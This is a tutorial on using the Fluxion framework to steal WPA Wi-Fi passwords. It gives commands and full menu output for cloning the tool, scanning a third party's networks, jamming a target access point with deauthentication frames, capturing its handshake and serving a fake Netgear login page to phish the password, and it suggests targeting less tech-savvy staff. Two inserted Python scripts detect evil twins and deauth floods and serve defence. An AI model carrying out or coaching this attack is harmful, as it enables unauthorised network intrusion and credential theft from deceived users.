Because tools like Reaver for pen testers are becoming less viable options as ISPs replace vulnerable routers, there is less and less certainty about which tools are appropriate for a particular target. If you do not have time to crack the WPA password, or if it's unusually strong, it can be difficult to figure out your next move. Fortunately, almost all systems have a common vulnerability that you can count on – users!
Social engineering goes beyond hardware and attacks the most vulnerable part of a system. One tool that makes this easy is Fluxion. Even the most anti-social hacker can hide behind a well-designed login page, and Fluxion automates the process of creating a fake access point to capture WPA passwords.
Users are almost always the weakest link in a system, so attacks against them are often preferred because they are cheap and effective. Hardware concerns can often be ignored if users are not familiar enough with the technology to recognize a social engineering attack. While social engineering attacks may raise red flags in more technologically advanced organizations, phishing and spoofing attacks on users are the first choice of both nation-states and criminal hackers against small and medium-sized businesses in any industry other than technology. These companies typically have many vulnerable or unpatched systems with default credentials that can be exploited over their wireless network, and their staff are unlikely to know what an attack looks like.
How Fluxion Works
Fluxion is a mix of technical and social automation that entices a user to hand over the Wi-Fi password at the push of a button. Specifically, it is a social engineering framework that uses an evil twin access point (AP), built-in jamming, and handshake capture to bypass the hardware and focus on the wetware. Tools such as Wifiphisher perform similar attacks but cannot validate the WPA passwords they collect.
Fluxion evolved from an earlier social engineering attack called Linset; the original tool was written mostly in Spanish and had several bugs. Fluxion is a rewrite of that attack, designed to trick inexperienced users into revealing the network password or passphrase.
Fluxion is unique in that it uses a captured WPA handshake to control not only the behavior of the login page but the behavior of the entire script. It jams the original network and creates a clone with the same name, enticing the disconnected user to join. The clone presents a fake login page stating that the router needs to reboot or load firmware and asks for the network password to continue. It's that simple.
The tool checks each entered password against the captured handshake and keeps jamming the target AP until the correct password is entered. Fluxion uses Aircrack-ng to check the results live as they are typed, and a successful check means the password is ours.
Tactically, this attack is only as good as the fake login screen. Many screens have been added to Fluxion since it was created, and with some research it is possible to develop others. In general, running this attack with the stock login screens immediately draws the attention of a more experienced user or a tech-savvy organization. The attack is most effective against the oldest or least skilled members of an organization. Sensitive access points with intrusion detection systems may detect this attack and try to defend against it by blocking your IP address in response to the built-in jamming.
System Compatibility and Requirements
Fluxion works on Kali Linux. Just make sure you are fully up to date or running Kali Rolling so that the system and its dependencies are current. You can run it on a dedicated Kali installation or in a virtual machine. If you're looking for a cheap, convenient platform, check out our Kali Linux Raspberry Pi build with the $35 Raspberry Pi. This tool does not work over SSH, because it needs to open additional windows.
For this to work, we need a compatible wireless adapter. Check out our 2019 list of Kali Linux compatible Wi-Fi adapters, or get our most popular adapter for beginners here. Make sure your monitor-mode-capable wireless adapter is plugged in, recognized by Kali, and listed when you run iwconfig or ifconfig.
Capturing WPA Passwords with Fluxion
Our goal in this article is to get into an organization through its WPA-encrypted Wi-Fi connection. We will launch an attack against users connected to the target access point, capture a handshake, set up a cloned (evil twin) AP, jam the target AP, set up a fake login page, and verify the captured password against the handshake.
The Fluxion developer recently shut down the project, but you can get an older version of it to continue using it. To get the older version of Fluxion running on your Kali Linux system, clone the git repository with:
~# git clone https://github.com/wi-fi-analyzer/fluxion
Cloning into 'fluxion'...
remote: Counting objects: 2646, done.
remote: Total 2646 (delta 0), reused 0 (delta 0), pack-reused 2646
Receiving objects: 100% (2646/2646), 26.14 MiB | 83.00 KiB/s, done.
Resolving deltas: 100% (1433/1433), done.
Find missing dependencies by navigating to the folder and listing the content to see what's in it.
~# cd fluxion
~/fluxion# ls
docs  install  lib  logos  siteinstaller.py  language  locale  fluxion.sh  README.md  sites
Then start it for the first time. You will probably see the following where some dependencies are needed.
~/fluxion# sudo ./fluxion.sh
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[        FLUXION 2  < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
aircrack-ng ..... OK!
aireplay-ng ..... OK!
airmon-ng ....... OK!
airodump-ng ..... OK!
awk ............. OK!
curl ............ OK!
dhcpd ........... Not installed (isc-dhcp-server)
hostapd ......... OK!
iwconfig ........ OK!
lighttpd ........ Not installed
macchanger ...... OK!
mdk3 ............ OK!
nmap ............ OK!
php-cgi ......... Not installed
pyrit ........... OK!
python .......... OK!
unzip ........... OK!
xterm ........... OK!
openssl ......... OK!
rfkill .......... OK!
strings ......... OK!
fuser ........... OK!
To get the needed dependencies and set your board to green, install the missing ones from the list. In my case these are dhcpd, lighttpd and php-cgi.
~ / fluxion # apt-get install dhcpd lighttpd php-cgi
If dhcpd installs udhcpd instead, run the following command to get the correct result.
~ / fluxion # apt-get install isc-dhcp-server
Once all dependencies are met, the board is green and you can proceed to the attack. Run Fluxion again with sudo ./fluxion.sh to get hacking.
~/fluxion# sudo ./fluxion.sh
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[        FLUXION 2  < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
Select your language
[1]  English
[2]  German
[3]  Romanian
[4]  Turkish
[5]  Spanish
[6]  Chinese
[7]  Italian
[8]  Czech
[9]  Greek
[10] French
[11] Slovenian
[deltaxflux@fluxion]-[~] 1
The first option is to select the language. Enter the number next to the one you want and press Enter to get to the interface selection. Here you see all connected network interfaces. Type the number next to the one you want, in my case 1 for wlan2.
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[        FLUXION 2  < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
Select an interface
[1]  wlan2  Atheros AR9271          ath9k
[2]  wlan1  Ralink RT2870/3070      rt2800usb
[3]  wlan0  Atheros AR9565          ath9k
[deltaxflux@fluxion]-[~] 1
This takes you to target identification. If you already know the channel of the network you want to attack, enter 2 to restrict the search to that channel. Otherwise, select 1 to scan all channels.
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[        FLUXION 2  < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[i] Select channel
[1]  All channels
[2]  Specific channel(s)
[3]  Back
[deltaxflux@fluxion]-[~] 1
During this process, a "WiFi Monitor" window opens. Let the scan collect wireless data for at least 30 seconds; it needs that long to verify that a client is connected to the network. Press Ctrl-C or click the window's (x) to end the capture once you see the wireless network you want. The window closes and the results are shown back in the terminal.
Select a target with active clients by typing the number next to it. Unless you are willing to wait for a client to connect (possibly for a long time), this attack will not work on a network with no clients. Who would we fool if no one were connected to the network?
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[        FLUXION 2  < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
WIFI LIST
ID      MAC                CHAN  SECU  PWR  ESSID
[1]     BC:F6:85:04:A9:98     9  WPA2  26%  ACR North
[2]     14:AB:F0:CC:6E:90     4  WPA2  30%  cpc-office
[3]     B4:75:0E:B4:54:D0     1  WPA2  34%  JadeMagnolia
[4]  *  E8:AD:A6:55:31:9E    11  WPA   34%
[5]     E8:ED:05:7A:4D:70     6  WPA2  36%  DG1670A72
[6]     A4:2B:B0:E9:5B:6D     1  WPA2  34%  MEDICO
[7]     28:9E:FC:62:7A:E6     1  WPA2  37%  MySpectrumWiFie0-2G
[8]     84:A0:6E:C6:93:CE     1  WPA2  37%  MyspectrumWiFic8-2G
[9]     9C:A3:A9:62:7C:E4    14  WPA2  36%  NVR9ca3a9627ce4
[10]    AC:5D:10:4A:95:2A    11  WPA2  36%  ATT304
[11]    8C:A2:FD:00:18:A5     6  WPA2  36%  HungryCandy
[12]    B0:98:2B:4E:62:AE     1  WPA2  36%  MySpectrumWiFia8-2G
[13]    A4:08:F5:70:79:8A     1  WPA2  36%  MySpectrumWiFi84-2G
[14]    A0:39:EE:7E:63:DA     1  WPA2  36%  MINDEOK-2G
[15]    24:79:2A:93:50:38     7  WPA2  34%  TWCWiFi Passpoint
[16]    24:79:2A:13:50:39     7  WPA2  34%  SpectrumWiFi Plus
[17]    8C:A2:FD:00:05:8E     6  WPA2  37%  LavishBest
[18]    AC:EC:80:09:65:C0     1  WPA2  37%  SHIN
[19]    00:AC:E0:91:65:80     1  WPA2  39%  SMQ 2.4
[20]    1A:91:82:8E:DF:FB     4  WPA2  38%
[21]    B2:52:16:21:47:E9     4  WPA2  38%  DIRECT-6SMFC-L5700DW_BR47e9
[22]    10:05:31:32:BB:30    11  WPA2  39%  GoGo Foot
[23]    EC:0E:C4:73:09:A7     1  WPA2  38%  WIFI73C9A4
[24]    20:E5:2A:4D:A6:F2     1  WPA2  38%  Netgear 100-2G
[25]    98:6B:3D:DF:64:50     6  WPA2  40%  Not defined
[26]    8C:A2:FD:00:9C:AD     6  WPA2  39%  Wittyslim
[27]    F4:6B:EF:30:0F:0E     1  WPA2  40%  PT STOP
[28]    38:3B:C8:02:59:66     4  WPA2  38%  ATT386
[29]    8C:A2:FD:01:23:28     6  WPA2  40%  Donna 🙂
[30]    FE:EC:DA:A4:06:40     6  WPA2  40%
[31]    84:A0:6E:C2:0A:2E     1  WPA2  41%  MyspectrumWiFi28-2G
[32]    98:6B:3D:CA:45:70     9  WPA2  42%  DG1670A72
[33]    14:91:82:8E:DF:FB     4  WPA2  40%  FBISurveillanceTruck
[34]    AC:E2:03:10:75:8A     5  WPA2  42%  DIRECT-89-HP Officejet Pro 6970
[35]    OU:A2:FD:01:2B:28     6  WPA2  41%  Donna 🙂 _Guest
[36]    34:6B:46:40:5A:5A     6  WPA2  42%  MySpectrumWiFi54-2G
[37]    50:33:8B:68:2D:74     1  WPA2  41%
[38]    1C:B9:04:6B:6D:53     3  WPA2  42%  Island 2B6D50
[39]    8C:A2:FD:00:63:41     6  WPA2  43%  Stevefi
[40]    F4:6B:EF:1E:AA:C6     1  WPA2  43%  Happy777-2G
[41]    1C:B0:44:CD:34:F0     5  WPA2  44%  MySpectrumWiFif2-2G
[42]    AC:EC:80:A8:F6:F0     6  WPA2  44%  TG1672GF2
[43] *  88:DC:96:55:72:00     1  WPA2  47%  Anchor
[44]    B0:6E:BF:DB:C1:B8     1  WPA2  45%  claire
[45]    90:1A:CA:6C:07:00     1  WPA2  47%  piccadilly
[46] *  40:20:09:2A:64:90    11  WPA2  46%  Spot 2.4 GHz
[47]    60:19:71:EE:A9:20    11  WPA2  45%  Seoultaxservice
[48]    0C:EA:C9:77:83:00    11  WPA   46%
[49]    D0:17:02:B2:06:08     8  WPA2  48%  ATI guest
[50]    60:38:E0:89:F5:02     3  WPA2  47%  thlee174
[51]    8C:FE:74:79:E3:73     9  WPA2  46%  Island 39E370
[52]    40:70:09:74:48:B0     6  WPA2  47%  envy
[53]    28:9E:FC:62:5B:26     1  WPA2  48%  MySpectrumWiFi20-2G
[54]    94:91:7F:25:41:B1     5  WPA2  58%  SSooniestyle
[55]    C4:01:7C:13:10:09    11  WPA2  60%  TWCWiFi Passpoint
[56]    CC:20:21:38:33:11    10  WPA2  36%  DT TUTORING
[57]    AC:B3:13:07:42:70    11  WPA2  28%  Vog Hair Salon-1
[58]    28:9E:FC:67:61:06    11  WPA2  40%  MySpectrumWiF100-2G
[59]    DC:EF:09:CD:30:37    11  WPA2  36%  fobdawg_EXT
[60]    AC:B3:13:7A:4A:90    11  WPA2  38%  Gryffindor
[61]    C4:01:7C:53:10:08    11  WPA2  58%  SpectrumWiFi Plus
[62]    8C:A2:FD:01:34:46     6  WPA2  35%  Chiefrutabaga
[63]    8C:A2:FD:00:41:B3     6  WPA2  35%  NNND_NET
[64]    C0:C1:C0:B6:F3:71     6  WPA2  39%  SilverHorse
[65]    24:F5:A2:2D:F8:09     6  WPA2  36%  LALASHOP2.4
[66]    60:72:20:3D:B6:50     6  WPA2  39%  MBC NEW MEDIA SPACE
[67]    08:02:8E:BB:18:1B    -1  WPA2  99%
(*) Active clients
Select target. To rescan, type r
[deltaxflux@fluxion]-[~] 46
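A scan list like the one above is also what a defender sees when hunting for the clone this attack creates: the same ESSID suddenly advertised from a second BSSID, often without encryption. The following is an added example, not Fluxion's code, that parses rows in the same column layout (MAC, channel, security, power, ESSID) and compares them against an inventory of the access points an organization actually owns. The inventory, the sample rows, and the BSSID 02:00:00:AA:BB:CC are constructed; the legitimate BSSID is taken from the target information shown later in this article.

```python
"""Flag evil-twin candidates in a Wi-Fi scan list (added example)."""
import re
from collections import defaultdict

# Constructed inventory: BSSIDs a defender knows are legitimate for each
# monitored SSID, and the security mode the SSID is expected to run.
KNOWN_APS = {
    "Spot 2.4 GHz": {"bssid": {"40:70:09:7A:64:90"}, "security": "WPA2"},
}

# Constructed scan rows in the same layout as the Fluxion/airodump-ng list.
# A leading '*' marks an AP with active clients.
SAMPLE_SCAN = """\
      60:19:71:EE:A9:20    11  WPA2  45%  Seoultaxservice
    * 40:70:09:7A:64:90    11  WPA2  46%  Spot 2.4 GHz
      02:00:00:AA:BB:CC    11  OPN   60%  Spot 2.4 GHz
      8C:FE:74:79:E3:73     9  WPA2  46%  Island 39E370
"""

ROW_RE = re.compile(
    r"^\s*(?P<client>\*)?\s*(?P<mac>(?:[0-9A-F]{2}:){5}[0-9A-F]{2})\s+"
    r"(?P<chan>-?\d+)\s+(?P<sec>WPA2|WPA|OPN|WEP)\s+(?P<pwr>\d+)%\s*"
    r"(?P<essid>.*?)\s*$",
    re.IGNORECASE,
)


def parse_scan(text):
    """Turn scan text into a list of dicts; rows that do not match are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            rows.append({
                "bssid": m["mac"].upper(),
                "channel": int(m["chan"]),
                "security": m["sec"].upper(),
                "power": int(m["pwr"]),
                "essid": m["essid"],
                "has_clients": m["client"] is not None,
            })
    return rows


def find_evil_twins(rows, known=KNOWN_APS):
    """Return (essid, bssid, reason) findings for monitored SSIDs.

    Two signals are checked, both of which the clone described above
    produces: an unknown BSSID advertising a monitored SSID, and the
    same SSID offered with a different (weaker) security mode.
    """
    findings = []
    for r in rows:
        inv = known.get(r["essid"])
        if inv is None:
            continue
        if r["bssid"] not in inv["bssid"]:
            findings.append((r["essid"], r["bssid"],
                             "unknown BSSID for monitored SSID"))
        if r["security"] != inv["security"]:
            findings.append((r["essid"], r["bssid"],
                             f"security {r['security']} differs from expected {inv['security']}"))
    return findings


def ssid_collisions(rows):
    """Map each ESSID seen from more than one BSSID to that set of BSSIDs.

    Multi-AP deployments produce collisions legitimately, so this is a
    triage list, not an alert by itself.
    """
    seen = defaultdict(set)
    for r in rows:
        if r["essid"]:
            seen[r["essid"]].add(r["bssid"])
    return {essid: bssids for essid, bssids in seen.items() if len(bssids) > 1}


if __name__ == "__main__":
    scan = parse_scan(SAMPLE_SCAN)
    for finding in find_evil_twins(scan):
        print("ALERT", finding)
    print("collisions:", ssid_collisions(scan))
```

Run against the constructed rows, the script reports two findings for the open 02:00:00:AA:BB:CC clone of "Spot 2.4 GHz" and one SSID collision; the legitimate WPA2 AP produces nothing. In practice the inventory would come from the wireless controller, and the rows from a monitor-mode sensor rather than a pasted scan.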
Step 4: Select your attack.
Type the number of the target network, in my case 46, and press Enter to load the network profile into the attack selection. For demonstration purposes I'll use option 1 to create a "FakeAP" with Hostapd. This creates a spoofed hotspot that uses the collected information to clone the target access point.
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[        FLUXION 2  < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
INFO WIFI
SSID = Spot 2.4 GHz / WPA2
Channel = 11
Speed = 95 Mbps
BSSID = 40:70:09:7A:64:90 (ARRIS Group, Inc.)
Select Attack Option
[1]  FakeAP - Hostapd (Recommended)
[2]  FakeAP - Airbase-ng (slower connection)
[3]  Bruteforce - (handshake is required)
[4]  Back
[deltaxflux@fluxion]-[~] 1
To verify that the password you receive actually works, you need a captured handshake to compare it against. If you already have one, you can enter its path on the next screen. If not, press Enter to skip and capture one in the next step.
Path to handshake (example: /root/fluxion.cap)
Press ENTER to skip
Path:
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[        FLUXION 2  < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
Handshake check
[1]  pyrit
[2]  aircrack-ng (Miss chance)
[3]  Back
[deltaxflux@fluxion]-[~] 2
The handshake check screen is shown above. If you choose the Aircrack-ng method, option 2, Fluxion sends deauthentication packets to the target AP as the client and listens for the resulting WPA handshake. But first you have to choose who to deauthenticate; I recommend option 3 so that only the target is affected and not everyone in range.
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[        FLUXION 2  < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
* Capturing handshake *
[1]  Deauth all
[2]  Deauth all [mdk3]
[3]  Deauth target
[4]  Rescan networks
[5]  Exit
[deltaxflux@fluxion]-[~] 3
Two windows open, one capturing data on the channel and one deauthenticating the client. At the top of the first window, make sure that "WPA handshake" is displayed. If you see it, as shown at the top right of the screenshot below, you have captured the handshake.
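The deauthentication step is the noisiest part of this attack, and the jamming that keeps the clone alive later is more of the same, so a burst of deauth/disassoc frames is the signal a wireless IDS keys on. The following is an added example, not Fluxion or Aircrack-ng code, of a sliding-window rate check over management-frame records (time in seconds, frame subtype, transmitter address, receiver address) such as a monitor-mode sensor could produce. The frame list, the client address, the window size, and the threshold are constructed for the example; the AP address is the target BSSID shown in this article.

```python
"""Detect a deauthentication flood from a frame log (added example)."""
from collections import defaultdict, deque

WINDOW_SECONDS = 10       # constructed: look at the last 10 s per transmitter
DEAUTH_THRESHOLD = 20     # constructed: normal roaming stays far below this


def detect_deauth_flood(frames, window=WINDOW_SECONDS, threshold=DEAUTH_THRESHOLD):
    """Return alerts as (time, transmitter, count_in_window).

    Only deauth/disassoc frames count. An alert fires once per transmitter,
    at the moment the number of such frames in the trailing window first
    reaches the threshold. Frames may arrive unordered; they are sorted.
    """
    recent = defaultdict(deque)   # transmitter -> timestamps of recent deauths
    alerted = set()
    alerts = []
    for t, subtype, src, _dst in sorted(frames, key=lambda f: f[0]):
        if subtype not in ("deauth", "disassoc"):
            continue
        q = recent[src]
        q.append(t)
        while q and t - q[0] > window:   # drop frames that fell out of the window
            q.popleft()
        if len(q) >= threshold and src not in alerted:
            alerted.add(src)
            alerts.append((t, src, len(q)))
    return alerts


def build_sample():
    """Constructed traffic: one minute of beacons, two benign deauths,
    then 40 deauths in two seconds spoofing the AP address to broadcast."""
    ap = "40:70:09:7A:64:90"       # target BSSID from this article
    client = "F8:01:13:00:00:01"   # constructed client address
    frames = [(i * 1.0, "beacon", ap, "FF:FF:FF:FF:FF:FF") for i in range(60)]
    frames.append((5.0, "deauth", ap, client))    # benign: client left the network
    frames.append((25.0, "deauth", ap, client))
    frames.extend((30.0 + i * 0.05, "deauth", ap, "FF:FF:FF:FF:FF:FF")
                  for i in range(40))
    return frames


if __name__ == "__main__":
    for when, src, count in detect_deauth_flood(build_sample()):
        print(f"t={when:.2f}s  {src}  {count} deauth/disassoc frames in {WINDOW_SECONDS}s")
```

On the constructed traffic the two benign deauths never trip the check, while the burst produces exactly one alert for the spoofed AP address shortly after t=30 s, once 20 frames fall inside the window. A real sensor would add the receiver address and reason code to the record so that a broadcast deauth with a reason the AP never uses stands out even below the rate threshold.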
Close both windows. Back in the terminal, type 1 for "Check handshake" and press Enter to load the handshake into your attack configuration.
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[        FLUXION 2  < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
* Capturing handshake *
Status handshake:
[1]  Check handshake
[2]  Back
[3]  Select another network
[4]  Exit
#> 1
Now create an SSL certificate, option 1, so the fake login page can be served without the browser raising an alarm and refusing to navigate to it.
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[        FLUXION 2  < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
Certificate invalid or missing, please select
[1]  Create an SSL certificate
[2]  Search for SSL certificate
[3]  Exit
#> 1
Now it's time to create the fake login page. Select 1 for "Web Interface" to use the social engineering tool.
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[        FLUXION 2  < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
INFO WIFI
SSID = Spot 2.4 GHz / WPA2
Channel = 11
Speed = 95 Mbps
BSSID = 40:70:09:7A:64:90 (ARRIS Group, Inc.)
Choose your option
[1]  Web Interface
[2]  Bruteforce
[3]  Exit
#? 1
You get a menu of fake login pages that can be presented to the user. They can be customized with some work, but should match the device and language of the target. Test the stock pages before using them, as some are not very convincing. I chose the English Netgear page, option 27.
This is the last step in arming the attack. Press Enter after selecting your login page to start it.
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[        FLUXION 2  < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
INFO WIFI
SSID = Spot 2.4 GHz / WPA2
Channel = 11
Speed = 95 Mbps
BSSID = 40:70:09:7A:64:90 (ARRIS Group, Inc.)
Select login page
[1]  English [ENG] (NEUTRA)
[2]  German [GER] (NEUTRA)
[3]  Russian [RUS] (NEUTRA)
[4]  Italian [IT] (NEUTRA)
[5]  Spanish [ESP] (NEUTRA)
[6]  Portuguese [POR] (NEUTRA)
[7]  Chinese [CN] (NEUTRA)
[8]  French [FR] (NEUTRA)
[9]  Turkish [TR] (NEUTRA)
[10] Romanian [RO] (NEUTRA)
[11] Hungarian [HU] (NEUTRA)
[12] Arabic [ARA] (NEUTRA)
[13] Greek [GR] (NEUTRA)
[14] Czech [CZ] (NEUTRA)
[15] Norwegian [NO] (NEUTRA)
[16] Bulgarian [BG] (NEUTRA)
[17] Serbian [SRB] (NEUTRA)
[18] Polish [PL] (NEUTRA)
[19] Indonesian [ID] (NEUTRA)
[20] Dutch [NL]
[21] Danish [DAN]
[22] Hebrew [HE]
[23] Thai [TH]
[24] Portuguese [BR]
[25] Slovenian [SVN]
[26] Belkin [ENG]
[27] Netgear [ENG]
[28] Huawei [ENG]
[29] Verizon [ENG]
[30] Netgear [ESP]
[31] Arris
[32] Vodafone [ESP]
[33] TP-Link [ENG]
[34] Ziggo [NL]
[35] KPN [NL]
[36] Zigoo2016 [NL]
[37] FRITZBOX_EN [DE]
[38] FRITZBOX_ENG [ENG]
[39] GENEXIS_DE [DE]
[40] Login Netgear
[41] Google
[42] MOVISTAR [ESP]
[43] Back
#? 27
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[        FLUXION 2  < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[i] Attack is underway.
[1]  Choose another network
[2]  Exit
#>
The attack opens several windows to create a cloned version of the target's wireless network while jamming the original access point. The user is tempted to join the network with the same name but without encryption.
Step 7: Capture the password
The user is presented with a fake login page that is either convincing or not, depending on which one you chose.
If the user enters an incorrect password, the handshake check fails and the user is prompted to try again. Once the correct password is entered, Aircrack-ng verifies it against the handshake and saves it to a text file while displaying it on screen. The user is sent to a "thank you" screen, the jamming stops, and the fake access point is shut down.
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[        FLUXION 2  < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[-] Cleaning and closing
[-] Disabling monitoring interface mon0
[-] Disabling interface wlan1
[-] Disabling forwarding of packets
[-] Cleaning iptables
[-] Restoring tput
[-] Deleting files
[-] Restarting Network Manager
[-] Clean up done successfully!
[+] Thank you for using Fluxion.
You can verify your success by checking the Aircrack-ng "WiFi Information" window.
Congratulations, you've obtained and verified a password by targeting the "wetware" rather than relying on an existing security flaw: you tricked a user into entering it for you.
Warning: This technique may be illegal without permission.
Fluxion combines scanning, cloning, creating a fake access point, serving a phishing login screen, and driving Aircrack-ng to capture and check WPA handshakes. As such, it leaves signatures in router logs that are consistent with these techniques. Most of these practices are illegal and unwelcome on any system you do not have permission to test.